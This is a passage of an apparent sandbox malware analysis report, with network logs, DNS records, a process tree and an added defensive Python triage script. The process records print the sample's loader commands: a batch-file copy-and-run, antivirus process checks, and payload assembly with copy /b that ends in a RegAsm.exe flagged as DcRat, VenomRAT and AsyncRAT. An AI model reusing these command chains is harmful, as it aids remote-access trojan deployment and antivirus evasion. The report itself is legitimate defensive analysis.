Dec 12, 2024 12:39:39.963977098 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:40.243812084 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:40.285521984 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:40.434616089 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:40.436976910 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:40.556679964 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:40.556734085 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:40.676493883 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:50.020348072 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:50.140135050 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:50.140337944 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:50.260185957 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:50.528508902 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:50.582355976 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:50.721716881 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:50.727823019 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:50.847690105 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:50.848129034 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:50.968400002 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:40:00.317343950 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:40:00.437181950 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:40:00.437235117 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:40:00.557804108 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:40:00.824667931 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:40:00.879273891 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:40:01.018521070 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:40:01.066838980 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:40:01.095571995 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:40:01.215836048 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:40:01.215904951 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:40:01.336230993 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:40:10.614283085 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:40:10.734122992 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:40:10.734332085 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:40:10.854139090 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:40:11.123089075 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:40:11.176301003 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:40:11.315006018 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:40:11.349971056 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:40:11.469816923 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:40:11.469954967 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:40:11.591176033 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:40:19.129893064 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:40:19.249972105 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
                                                                                              Dec 12, 2024 12:40:19.250375032 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:19.370377064 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:19.643337965 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:19.692018032 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:19.835167885 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:19.836205959 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:19.956022978 CET444949843208.115.220.58192.168.2.7
                                                                                              Dec 12, 2024 12:40:19.956141949 CET498434449192.168.2.7208.115.220.58
                                                                                              Dec 12, 2024 12:40:20.076083899 CET444949843208.115.220.58192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 12, 2024 12:38:06.671679020 CET | 50051 | 53 | 192.168.2.7 | 1.1.1.1
Dec 12, 2024 12:38:18.941162109 CET | 60089 | 53 | 192.168.2.7 | 1.1.1.1
Dec 12, 2024 12:38:19.175452948 CET | 53 | 60089 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 12, 2024 12:38:06.671679020 CET | 192.168.2.7 | 1.1.1.1 | 0x897d | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 12:38:18.941162109 CET | 192.168.2.7 | 1.1.1.1 | 0x8563 | Standard query (0) | iLAKhXCSlkKKBvjaNGAojhxfYe.iLAKhXCSlkKKBvjaNGAojhxfYe | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 12, 2024 12:38:06.809098959 CET | 1.1.1.1 | 192.168.2.7 | 0x897d | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 12:38:09.798491001 CET | 1.1.1.1 | 192.168.2.7 | 0x175c | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 12:38:09.798491001 CET | 1.1.1.1 | 192.168.2.7 | 0x175c | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 12:38:19.175452948 CET | 1.1.1.1 | 192.168.2.7 | 0x8563 | Name error (3) | iLAKhXCSlkKKBvjaNGAojhxfYe.iLAKhXCSlkKKBvjaNGAojhxfYe | none | none | A (IP address) | IN (0x0001) | false
Dec 12, 2024 12:38:31.718424082 CET | 1.1.1.1 | 192.168.2.7 | 0xb2e9 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 12:38:31.718424082 CET | 1.1.1.1 | 192.168.2.7 | 0xb2e9 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 12:38:48.503556013 CET | 1.1.1.1 | 192.168.2.7 | 0xd065 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 12:38:48.503556013 CET | 1.1.1.1 | 192.168.2.7 | 0xd065 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 12:39:16.156339884 CET | 1.1.1.1 | 192.168.2.7 | 0xc0d8 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 12:39:16.156339884 CET | 1.1.1.1 | 192.168.2.7 | 0xc0d8 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.100 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 12:39:16.156339884 CET | 1.1.1.1 | 192.168.2.7 | 0xc0d8 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.101 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 12:39:16.156339884 CET | 1.1.1.1 | 192.168.2.7 | 0xc0d8 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.98 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 12:39:16.156339884 CET | 1.1.1.1 | 192.168.2.7 | 0xc0d8 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.99 | A (IP address) | IN (0x0001) | false

Target ID: 0
Start time: 06:38:10
Start date: 12/12/2024
Path: C:\Users\user\Desktop\OR8Ti8rf8h.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\OR8Ti8rf8h.exe"
Imagebase: 0x400000
File size: 3'391'331 bytes
MD5 hash: 6681713C421E1B4951D5A08C39F43E97
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 06:38:12
Start date: 12/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmd
Imagebase: 0x410000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 06:38:12
Start date: 12/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 06:38:14
Start date: 12/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0xee0000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 06:38:14
Start date: 12/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /I "wrsa opssvc"
Imagebase: 0x1e0000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 06:38:15
Start date: 12/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0xee0000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 06:38:15
Start date: 12/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase: 0x1e0000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 06:38:16
Start date: 12/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c md 585711
Imagebase: 0x410000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 06:38:16
Start date: 12/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /V "ComplyFailuresGuardsDomInvolvementRadarScreensKidney" Tonight
Imagebase: 0x1e0000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 06:38:16
Start date: 12/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c copy /b ..\Solaris + ..\Harassment + ..\Proudly + ..\Turned + ..\Viruses + ..\Wallpapers + ..\Usc + ..\Crm + ..\Ribbon + ..\Confident + ..\Angle + ..\Alumni + ..\Fees + ..\Reserve + ..\Reflected + ..\Include + ..\Specialist + ..\Respondent + ..\False + ..\Assume + ..\Regardless + ..\Mary + ..\Consecutive + ..\Movers + ..\Scottish + ..\Holocaust + ..\Experience + ..\Phrase + ..\Started + ..\Disturbed + ..\Needle + ..\Pipes + ..\Hollow + ..\Spelling + ..\Reed + ..\Tft + ..\Specialties Y
Imagebase: 0x410000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 06:38:17
Start date: 12/12/2024
Path: C:\Users\user\AppData\Local\Temp\585711\Depression.com
Wow64 process (32bit): true
Commandline: Depression.com Y
Imagebase: 0x1000000
File size: 947'288 bytes
MD5 hash: 62D09F076E6E0240548C2F837536A46A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited: true

Target ID: 12
Start time: 06:38:17
Start date: 12/12/2024
Path: C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit): true
Commandline: choice /d y /t 5
Imagebase: 0xa10000
File size: 28'160 bytes
MD5 hash: FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 14
Start time: 06:39:06
Start date: 12/12/2024
Path: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe
Imagebase: 0xd90000
File size: 65'440 bytes
MD5 hash: 0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 0000000E.00000002.2630405640.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 0%, ReversingLabs
                                                                                              Has exited:false
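Two triage checks a practitioner would run on the record above, as an added example that is not part of the Joe Sandbox report: RegAsm.exe is a .NET Framework utility that normally lives only under the Framework directories, so a copy executing from a user-writable path such as %TEMP%\585711\ is itself an indicator, and the Yara hits should be grouped by memory region before reading family names into them, because DcRat and VenomRAT are AsyncRAT derivatives and several family rules firing on one dump is the expected outcome. The process path and the dump names are copied from the record; the benign baseline path, the list of .NET utilities, the Framework roots, and the decoding of the dump-name fields (fourth field base address, fifth field page protection, 0x40 being PAGE_EXECUTE_READWRITE) are assumptions.

```python
# Added triage example (not Joe Sandbox code): flag a .NET utility running from a
# user-writable path and group the report's Yara hits by memory region.
from collections import defaultdict
from pathlib import PureWindowsPath

# .NET Framework utilities that ship only under the Framework directories (assumed list).
DOTNET_LOLBINS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe", "csc.exe"}

# Assumed legitimate roots for those binaries (standard Windows layout).
FRAMEWORK_ROOTS = (
    "c:\\windows\\microsoft.net\\framework\\",
    "c:\\windows\\microsoft.net\\framework64\\",
)
USER_WRITABLE_MARKERS = ("\\appdata\\local\\temp\\", "\\users\\public\\", "\\programdata\\")

PAGE_EXECUTE_READWRITE = 0x40


def flag_process(path: str) -> dict:
    """Return triage flags for one process image path."""
    p = path.lower()
    name = PureWindowsPath(p).name
    in_framework = p.startswith(FRAMEWORK_ROOTS)
    return {
        "image": name,
        "dotnet_lolbin_off_path": name in DOTNET_LOLBINS and not in_framework,
        "from_user_writable_dir": any(m in p for m in USER_WRITABLE_MARKERS),
    }


def parse_sdmp_name(source: str) -> dict:
    """Decode a Joe Sandbox memory dump name.

    Assumed layout of the dotted fields: process index, dump stage, unique id,
    base address, page protection, ...; only the first five are used here.
    """
    fields = source.removesuffix(".sdmp").split(".")
    protect = int(fields[4], 16)
    return {
        "process_index": int(fields[0], 16),
        "base": int(fields[3], 16),
        "protect": protect,
        "rwx": protect == PAGE_EXECUTE_READWRITE,
    }


def group_yara_by_region(matches):
    """Map memory region base address -> set of rule names that hit it."""
    regions = defaultdict(set)
    for rule, source in matches:
        regions[parse_sdmp_name(source)["base"]].add(rule)
    return dict(regions)


# Values copied from the RegAsm.exe record above.
REGASM_PATH = r"C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe"
SDMP_A = "0000000E.00000002.2630405640.00000000035F2000.00000004.00000800.00020000.00000000.sdmp"
SDMP_B = "0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp"
YARA_HITS = [
    ("JoeSecurity_DcRat_2", SDMP_A),
    ("JoeSecurity_VenomRAT", SDMP_B),
    ("JoeSecurity_StormKitty", SDMP_B),
    ("JoeSecurity_CredentialStealer", SDMP_B),
    ("JoeSecurity_BrowserPasswordDump_1", SDMP_B),
    ("Windows_Trojan_DCRat_1aeea1ac", SDMP_B),
    ("INDICATOR_SUSPICIOUS_EXE_Discord_Regex", SDMP_B),
    ("MALWARE_Win_AsyncRAT", SDMP_B),
]
# Constructed benign baseline: the same utility in its normal location.
BENIGN_PATH = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

if __name__ == "__main__":
    print(flag_process(REGASM_PATH))
    print(flag_process(BENIGN_PATH))
    for base, rules in sorted(group_yara_by_region(YARA_HITS).items()):
        print(f"0x{base:08X}: {len(rules)} rules {sorted(rules)}")
```

Run as-is, it flags the Temp copy on both checks, leaves the baseline clean, and shows seven of the eight rules landing on the single region at 0x01172000 with execute-read-write protection, which is the region to pull for configuration extraction rather than trusting any one rule's family label.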


                                                                                                Execution Graph

                                                                                                Execution Coverage:17.7%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:21%
                                                                                                Total number of Nodes:1482
                                                                                                Total number of Limit Nodes:28
execution_graph: node and edge listing omitted here (rendered as an interactive graph in the original report). Nodes are function addresses in the 0x401000-0x407300 range, each annotated with the Windows APIs it calls (CreateFileW, ReadFile, SetFilePointer, RegOpenKeyExW, RegDeleteValueW, RegSetValueExW, OpenProcess, CreateThread, lstrcpynW, wsprintfW, SHFileOperationW, MessageBoxIndirectW and others); edges are caller -> callee.
4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 
SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 
4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 
40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 